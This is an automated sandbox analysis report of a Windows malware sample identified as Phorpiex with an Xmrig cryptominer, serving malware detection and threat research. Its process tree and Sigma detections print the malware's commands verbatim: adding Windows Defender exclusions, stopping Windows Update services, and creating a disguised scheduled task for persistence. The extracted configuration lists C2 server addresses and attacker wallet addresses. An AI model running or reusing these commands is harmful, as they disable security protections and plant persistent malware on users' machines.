Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
lJ4EzPSKMj.exe

Overview

General Information

Sample name:lJ4EzPSKMj.exe
renamed because original name is a hash value
Original sample name:ada49c1b3b3d878fe42df213844d8d37ec59ac4f906060556ad901ba0d55b2a9.exe
Analysis ID:1542689
MD5:93ac88b5786cc524a9668ab13c73584f
SHA1:d5e328f47208d69c7a47ec2713b1fcbbe51fb4fc
SHA256:ada49c1b3b3d878fe42df213844d8d37ec59ac4f906060556ad901ba0d55b2a9
Tags:exeuser-JAMESWT_MHT
Infos:

Detection

Phorpiex, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Stop multiple services
Suricata IDS alerts for network traffic
Yara detected Phorpiex
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to check if Internet connection is working
Contains functionality to detect sleep reduction / modifications
Detected Stratum mining protocol
Drops PE files with a suspicious file extension
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking mutex)
Found hidden mapped module (file has been removed from disk)
Found strings related to Crypto-Mining
Hides that the sample has been downloaded from the Internet (zone.identifier)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Stops critical windows services
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Connects to several IPs in different countries
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (may stop execution after accessing registry keys)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • lJ4EzPSKMj.exe (PID: 3780 cmdline: "C:\Users\user\Desktop\lJ4EzPSKMj.exe" MD5: 93AC88B5786CC524A9668AB13C73584F)
    • 5232.scr (PID: 5460 cmdline: "C:\Users\user\AppData\Local\Temp\5232.scr" /S MD5: 06560B5E92D704395BC6DAE58BC7E794)
      • sysppvrdnvs.exe (PID: 760 cmdline: C:\Windows\sysppvrdnvs.exe MD5: 06560B5E92D704395BC6DAE58BC7E794)
        • cmd.exe (PID: 5928 cmdline: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 2440 cmdline: powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • cmd.exe (PID: 2952 cmdline: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 5064 cmdline: sc stop UsoSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • sc.exe (PID: 1364 cmdline: sc stop WaaSMedicSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • sc.exe (PID: 1892 cmdline: sc stop wuauserv MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • sc.exe (PID: 6256 cmdline: sc stop DoSvc MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
          • sc.exe (PID: 1240 cmdline: sc stop BITS /wait MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • 513318274.exe (PID: 2456 cmdline: C:\Users\user\AppData\Local\Temp\513318274.exe MD5: CB8420E681F68DB1BAD5ED24E7B22114)
          • cmd.exe (PID: 2660 cmdline: "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • reg.exe (PID: 6828 cmdline: reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • cmd.exe (PID: 4864 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • schtasks.exe (PID: 3576 cmdline: schtasks /delete /f /tn "Windows Upgrade Manager" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • 2573513776.exe (PID: 5652 cmdline: C:\Users\user\AppData\Local\Temp\2573513776.exe MD5: 0C37EE292FEC32DBA0420E6C94224E28)
        • 28849683.exe (PID: 3396 cmdline: C:\Users\user\AppData\Local\Temp\28849683.exe MD5: 96509AB828867D81C1693B614B22F41D)
          • 1428024550.exe (PID: 6956 cmdline: C:\Users\user\AppData\Local\Temp\1428024550.exe MD5: 13B26B2C7048A92D6A843C1302618FAD)
        • 15714163.exe (PID: 6636 cmdline: C:\Users\user\AppData\Local\Temp\15714163.exe MD5: 5A0D146F7A911E98DA8CC3C6DE8ACABF)
  • sysppvrdnvs.exe (PID: 5236 cmdline: "C:\Windows\sysppvrdnvs.exe" MD5: 06560B5E92D704395BC6DAE58BC7E794)
  • powershell.exe (PID: 5848 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • winupsecvmgr.exe (PID: 6108 cmdline: "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe" MD5: 13B26B2C7048A92D6A843C1302618FAD)
    • conhost.exe (PID: 4668 cmdline: C:\Windows\System32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dwm.exe (PID: 1644 cmdline: C:\Windows\System32\dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)
  • powershell.exe (PID: 7164 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 5440 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • winupsecvmgr.exe (PID: 5896 cmdline: "C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe" MD5: 13B26B2C7048A92D6A843C1302618FAD)
  • powershell.exe (PID: 916 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; } MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
PhorpiexProofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: Phorpiex

{"C2 url": ["http://185.215.113.66/", "http://91.202.233.141/"], "Wallet": ["15TssKwtjMtwy4vDLcLsQUZUD2B9f7eDjw85sBNVC5LRPPnC", "1BzmrjmKPKSR2hH5BeJySfiVA676E8DYaK", "lskaj7asu8rwp4p9kpdqebnqh6kzyuefzqjszyd5w", "ltc1qt0n3f0t7vz9k0mvcswk477shrxwjhf9sj5ykrp", "zil19delrukejtr306u0s7ludxrwk434jcl6ghpng3", "zncBgwqwqquPLHrM4ozrtr3LPyFuNVemy4v", "cro1xq0gkfldclds7y7fa2x6x25zu7ttnxxkjs66gf", "erd1hwcnscv0tldljl68upajgfqrcrmtznth4n6ee46le43cqpe5tatqw96dnx", "kava1r9xek0h0vkfra44lg3rp07teh9elxg2n6vsdzn", "inj1e2g9nyfjcnvgjpaa3czx2spgf2jx3gp4gk0nl9", "osmo125f3mw4xd9htpsq4zj5w5ezm5gags37y6pnhx3", "one1mnk7lk2506r0ewvr7zgwfuyt7ahvngwqedka3x", "3PMiLynrGVZ8oEqvoqC4hXD67B1WoALR4pc", "3ESHude8zUHksQg1h6hHmzY79BS36L91Yn", "DLUzwvyxN1RrwjByUPPzVMdfxNRPGVRMMA", "DsWwjQcpgo8AoFYvFnLrwFpcx8wgjSYLexe", "t1J6GCPCiHW1eRdjJgDDu6b1vSVmL5U7Twh", "terra1mw3dhwak2qe46drv4g7lvgwn79fzm8nr0htdq5", "thor1tdexg3v738xg9n289d6586frflkkcxxdgtauur", "tz1ZUNuZkWjdTt597axUcyZ5kFRtUZmUKuG2", "stars125f3mw4xd9htpsq4zj5w5ezm5gags37yxxh6mj", "stride125f3mw4xd9htpsq4zj5w5ezm5gags37y33qmy0", "sei125f3mw4xd9htpsq4zj5w5ezm5gags37ylk33kz", "sys1q0zg3clqajs04p2yhkgf96nf4hmup9mdr8l38u6", "bnb1msyt0djx4ecspfxg5en0ye465kg3kmv9utzml2", "bc1ppypcmu3684n648gyj62gjp2rw0xy7w3vwfamatlg29ajp4z52desafa0sr", "bc1qc9edl4hzl9jyt8twdad3zjeh2df2znq96tdezd", "btg1qwg85kf0r3885a82wtld053fy490lm2q2gemgpy", "ronin:a77fa3ea6e09a5f3fbfcb2a42fe21b5cf0ecdd17", "bitcoincash:qph44jx8r9k5xeq5cuf958krv3ewrnp5vc6hhdjd3r", "cosmos125f3mw4xd9htpsq4zj5w5ezm5gags37yj6q8sr", "addr1qxlwyj95fk9exqf55tdknx49e5443nr925tajatrdqpp8djla7u9jhswc3dk39se79f9zhwwq2ca95er3mylm48wyalqr62dmg", "nano_3p8stz4wqicgda1g3ifd48girzd5u74is8sdqq99tkuuz1b96wjwbc7yrmnb", "GBQJMXYXPRIWFMXIFJR35ZB7LRKMB4PHCIUAUFR3TKUL6RDBZVLZEUJ3", "Gcrx8cK7ffKLaPJwiYHQrgi6pFTLbJsBPV", "EQxXrZv7VQpoAA15kJ1XJyXVxT3yQSoNyM", "B62qpDfv86fUZc4ntrYJL6eFJZajjNKRcBuW5iPbcLNkiPekLkV8NdA", "BKyTYg4eZC9NCzcL8M3hcUmDhCnBJrSScH", "UQAbBKbfkiK3Gjo86zgD3yYO5Njf7zxPTEO4JLqN13ruoGDb"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\5232.scrJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\tdrpl[1].exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
        C:\Windows\sysppvrdnvs.exeJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
          C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpMacOS_Cryptominer_Xmrig_241780a1unknownunknown
            • 0x4cb268:$a1: mining.set_target
            • 0x4c6a48:$a2: XMRIG_HOSTNAME
            • 0x4c8540:$a3: Usage: xmrig [OPTIONS]
            • 0x4c6a20:$a4: XMRIG_VERSION
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000003.00000003.1557882217.0000000000496000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
              00000029.00000002.2908746013.000002595CEF2000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
                00000004.00000002.2906576725.0000000000410000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                  00000004.00000000.1557031071.0000000000410000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                    00000003.00000000.1534188945.0000000000410000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                      Click to see the 13 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      4.0.sysppvrdnvs.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                        17.2.sysppvrdnvs.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                          4.2.sysppvrdnvs.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                            3.0.5232.scr.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                              17.0.sysppvrdnvs.exe.400000.0.unpackJoeSecurity_Phorpiex_4Yara detected PhorpiexJoe Security
                                Click to see the 17 entries

                                Sigma Signatures

                                Operating System Destruction

                                barindex
                                Sigma detected: Stop multiple services
                                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, CommandLine: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\sysppvrdnvs.exe, ParentImage: C:\Windows\sysppvrdnvs.exe, ParentProcessId: 760, ParentProcessName: sysppvrdnvs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait, ProcessId: 2952, ProcessName: cmd.exe

                                System Summary

                                barindex
                                Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, ProcessId: 5848, ProcessName: powershell.exe
                                Sigma detected: Invoke-Obfuscation VAR+ Launcher
                                Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, CommandLine|base64offset|contains: [, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }, ProcessId: 5848, ProcessName: powershell.exe
                                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\sysppvrdnvs.exe, ParentImage: C:\Windows\sysppvrdnvs.exe, ParentProcessId: 760, ParentProcessName: sysppvrdnvs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 5928, ProcessName: cmd.exe
                                Sigma detected: Powershell Defender Exclusion
                                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\sysppvrdnvs.exe, ParentImage: C:\Windows\sysppvrdnvs.exe, ParentProcessId: 760, ParentProcessName: sysppvrdnvs.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE", ProcessId: 5928, ProcessName: cmd.exe
                                Sigma detected: SCR File Write Event
                                Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\Desktop\lJ4EzPSKMj.exe, ProcessId: 3780, TargetFilename: C:\Users\user\AppData\Local\Temp\5232.scr
                                Sigma detected: Suspicious Screensaver Binary File Creation
                                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\lJ4EzPSKMj.exe, ProcessId: 3780, TargetFilename: C:\Users\user\AppData\Local\Temp\5232.scr
                                Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\sysppvrdnvs.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\5232.scr, ProcessId: 5460, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings
                                Sigma detected: Non Interactive PowerShell Process Spawned
